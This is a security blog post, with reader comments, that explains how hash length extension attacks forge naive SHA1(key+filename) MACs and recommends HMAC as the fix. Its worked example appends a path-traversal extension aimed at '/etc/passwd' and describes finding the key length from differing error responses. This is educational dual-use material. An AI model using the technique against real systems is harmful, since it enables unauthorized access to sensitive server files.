Web Application Security

Hash Length Extension Attacks

It seems that many penetration testers rarely test cryptographic vulnerabilities. I’ve always been interested in cryptography, so I’ve made it a goal to understand how web application developers misuse crypto, and how to exploit the flaws that the misuse of cryptography create.

In January, I did some independent research on how to perform hash length extension attacks against poorly implemented message authentication codes (MACs). I found several good research papers and blog posts that discussed how these attacks work in a very general sense. However, there was not much information that specifically explained the details of a length extension attack. In this post, I’ll be explaining exactly what does happen.

Message Authentication Codes 101

Message authentication codes (MACs) are a way to verify the authenticity of a message. In the more naive implementation of a MAC, the server has a secret key that it concatenates with a message, and then hashes the combination with an algorithm, such as MD5 or SHA1. For example, consider an application that is designed to give an authorized user the ability to download specific files. The site might create a MAC for the filename like this:

def create_mac(key, fileName)

   return Digest::SHA1.hexdigest(key + fileName)


The resulting URL might look something like:


When the user sends the request to download a file, the following function is executed:

def verify_mac(key, fileName, userMac)

    validMac = create_mac(key, filename)

    if (validMac == userMac) do






With this code, the server should only call initiateDownload if the user has not tampered with the filename… or so the theory goes. In reality, this method of creating a MAC leaves the site vulnerable to an attack where attackers can append their own content to the end of the file parameter.

Length Extension Attacks, The Simple Explanation

Cryptographic hash functions, such as MD5, SHA1, SHA2, etc., are based on a construct known as Merkle–Damgård. An interesting issue arises with this type of hash function: If you have a message that is concatenated with a secret and the resulting hash of the concatenated value (the MAC) – and you know only the length of that secret – you can add your own data to the message and calculate a value that will pass the MAC check without knowing the secret itself.

Example: message + padding + extension

Continuing the example from above, an extension attack against the hypothetical file download MAC would look like this:




Length Extensions In Depth

To understand why this attack works, you first must understand what happens inside a hash function.

How Hash Algorithms Work

Hash functions work on blocks of data. As an example, 512 bits is the block length for MD5, SHA1 and SHA256. Most messages that are hashed will have a length that is not evenly divisible by a hash function block length. Thus, the message must be padded to match a multiple of the block length. Using the file download MAC example above, the message after padding would look like this (the ‘x’s represent the secret key):



In SHA1, which is the algorithm being used in this example, a hash consists of a series of five integers. When displayed, these integers are usually in hexadecimal format and concatenated together. The initial value − aka, the registers − are set to this value when the algorithm is run: 67452301, EFCDAB89, 98BADCFE, 10325476, C3D2E1F0. Then, once the message has been padded, it is broken up into 512 bit blocks. The algorithm runs through these blocks, performing a series of calculations with the blocks to update the registers. Once these calculations are completed, the contents of the registers are the resulting hash of the message.

Calculating An Extension

The first step in calculating an extension is to create a new MAC. To do this, the contents we are extending the message with must be hashed: ‘/../../../../../../../etc/passwd’ in our example. However, when performing this hash, the initial registers must be overridden with the MAC from the origional message. You can think of this as making the SHA1 function start off at the state where the server’s hash function left off.

Attacker's MAC = SHA1(extension + padding) <- but with overridden registers

For this attack to work, the extension must be in its own block when it goes into the server’s hash function. The second step is to calculate enough padding so that key + message + padding == some multiple of 512 bits. In this example, the key is 11 characters long. Therefore, the padded message would look like this:



The padded and extended message is then sent to the server, with the new MAC:




Here is what the server hashes when it hashes the attacker’s hacked message: secret + message + padding to the next block + extension + padding to the end of that block. The result of the server’s hash will be ee40aa8ec0cfafb7e2ec4de20943b673968857a5, which provides the same result as hashing the extension while overriding the registers with the original MAC. This occurs because the attacker’s hashing operation essentially started off at the same state the server’s hash operation is at when the server has hashed half of the attack.

How To Run The Attack

For simplicity, in this example I revealed that the key length was 11 characters. In a real-world attack, where the attacker will not know the length of the key, he will need to determine the key length.

Continuing the example, let’s say that the vulnerable website returns different errors (HTTP response codes, error messages in a response body, etc.) when a MAC validation failed versus when the validation succeeded, but the file was not found. An attacker can then calculate multiple extensions, one for each possible key length, and send each extension to the server. When the server responds with an error indicating that the file was not found, then, conversely, a length extension vulnerability has been found, and the attacker is free to calculate new extensions aimed at gaining unauthorized access to sensitive files on the server.

How To Defend Against This Attack

The solution to this vulnerability is to use an algorithm known as HMAC. Instead of just hashing the key concatenated with the message, HMAC does something like this:

MAC = hash(key + hash(key + message))

How HMAC actually works is a bit more complicated, but you get the general idea. The important part is that because it is hashed into the message twice, the key is not vulnerable to the extension attack described in this post. HMAC was first published in 1996, and has since been implemented in just about every programming language’s standard library.


Though there are still some crazy people who write their own cryptographic algorithms, most people have gradually figured out that writing their own crypto is a bad idea. However, it is essential to do more than merely use publicly vetted crypto algorithms: You’ve must use those algorithms in the right way. Unless you thoroughly understand how the algorithms you use work – and know how to use them correctly – it is always safer to rely on professionally vetted, high-level libraries that will take care of the low-level stuff for you.

  • Lorenzo

    Hi Douglas

    thanks for your post…very interesting!

    I’m trying to implement your attack in python but I am unable to forge the right Attacker MAC value… I used the pypy python implementation for sha, and added a function to set the registers, but the forged mac value (ee40…) is always different from the one in the post.

    Maybe there is something I miss :)

    1)Have I exactly understood what is the message that the attacker has to hash in order to obtain a valid MAC?

    padding = ‘x80x00x00…’

    extension = ‘…../etc/passwd’ #various dot dot slash omitted

    AttackerMAC = sha1(extension+padding) ?

    2) These are the values that overrides the registers… am I right?


    # h0 = 563162c9 , h1 = c71a1736, h2 = 7d44c165, h3 = b84b85ab, h4 = 59d036f9

    h0 = 0x563162C9L

    h1 = 0xC71A1736L

    h2 = 0x7D44C165L

    h3 = 0xB84B85ABL

    h4 = 0x59D036F9L


    • Matthew Nelson

      Lorenzo, remember that, in addition to the initialization vector, you must also adjust the length appended by your modified SHA1.

    • Otto Dandenell

      Hi Lorenzo.

      My interpretation is this:

      The attack is based on the assumption that the attacker ALREADY KNOWS the VALID MAC to the file “report.pdf”. But he doesn’t know (and doesn’t need to know) the secret key.

      In order to create the attackerMAC, you need to “replay” the verify_mac() that would take place on the server. The server would do (as per the pseudo-code above:

      validMac = create_mac(key, filename)

      This would be implemented as:



      Because the extention is crafted so as to be just long enough to end at 512 bytes, we know that on the server, the sha1() will be executed thus (in pseudo code):

      1) sha1(‘xxxxxxxxxxxreport.pdfx80x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00

      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xA8’) –> Registers will be set to our known valid mac

      2) sha1(‘/../../../../../../../etc/passwd’)

      So, the trick is to first set the registers to your known valid mac, then run the sha1() hash function using only the payload as argument.

      I don’t know if the sha1 routine of your crypto library supports setting the registry arbitratrily. If not, find a description of how sha1 is implemented and roll your own.

    • Otto Dandenell

      To clarify my previous comment: The attacker does need to know the length of the secret key (in order to determine the length of the padding). To find the length, the attacker can try everything between 0 and 511 bytes and see if there is any error-response that differs (as per suggested in the article) or even get the payload file back.

  • sandor


    good article. Quick question. What would happen if you’d changed the MAC method just a little bit, that the key is appended to the fileName, like so:

    hexdigest(fileName + key)

    Then the attack would not work anymore.. Right?

    grz Sandro

    • John


      Your modification would have the exact same vulnerability. The gist of the problem is that you have a message ‘xxxxx’ who’s length is known to you and the resulting hash of that message allowing you to compute a new starting state in which to resume hashing with new content. It doesn’t matter if ‘xxxxx’ is ‘secret+something_known’ or ‘something_known+secret’ or even ‘something_totally_secret’. It just needs to be know how long the message being hashed is.

    • Mik

      Correct, Sandro – This won’t work if the last value isn’t under attacker control.

    • http://bit.ly/5bip23 Keeskip

      In that case (someone correct me if I’m wrong), if the hash function you’re using is MD5, you’ll be vulnerable to another kind collision attack in MD5, the one that makes a lot of people say MD5 is not secure anymore. SHA2 doesn’t (yet!) have this vulnerability, though, but I’m not sure if you’d be completely in the clean.

      Also HMAC covers a few other likely failure scenarios, so it’s best to just stick with that tried and true algorithm. The advantage is that if somehow a vulnerability would be found in HMAC, you’d probably hear about it real quick, since that’d be a big problem for many systems globally.

      Finally, even though MD5 is considered “broken” by a lot of people, HMAC+MD5 is not. At least, I’m not aware of anything. So HMAC is really pretty good. I suggest you check the Wikipedia page on HMAC, it’s quite easy to understand. The author of this article gave about 3/4s of the algorithm (for brevity, I understand), the full HMAC algo adds some special padding bytes to the formula to strengthen it even more against some theoretical attacks. So basically, if your standard library implements MD5 but not HMAC, it’s about 10 lines of code to build HMAC+MD5, which is secure.

      Do make sure your secret key is a long string of random characters, not a password or something. You wouldn’t want to go through all this trouble and get brute-forced :)

  • jay

    Is what sandor asking correct, can you simply reverse the order of the message and shared secret to be secure?

    hexdigest(fileName + key) rather than hexdigest(key + fileName)

  • Alexey

    Hash_extender is a tool for hash length extension attack. I think it should be here


    • Carlos

      Can anyone help me adapt hash_extender to a particular case I have? I’m having trouble making it work and it seems so easy…it’s making me crazy. Thanks in advance!

  • Pingback: What Your Users Don’t Know (Part 2) | Art & Logic Blog()

  • http://www.aureliendebord.com/ Référencement Strasbourg

    Wow ! Thanks for this very well documented paper !

  • Pingback: 科普哈希长度扩展攻击(Hash Length Extension Attacks)! - XY0day()

  • Pingback: 科普哈希长度扩展攻击(Hash Length Extension Attacks) | Ettack's Blog()

  • Pingback: 哈希长度扩展攻击 | Ettack's Blog()

  • Pingback: CySCA2014 Web Application Pentest – Gerben Kleijn()

  • Pingback: Capture ALL the Flags | WhiteHat Security Blog()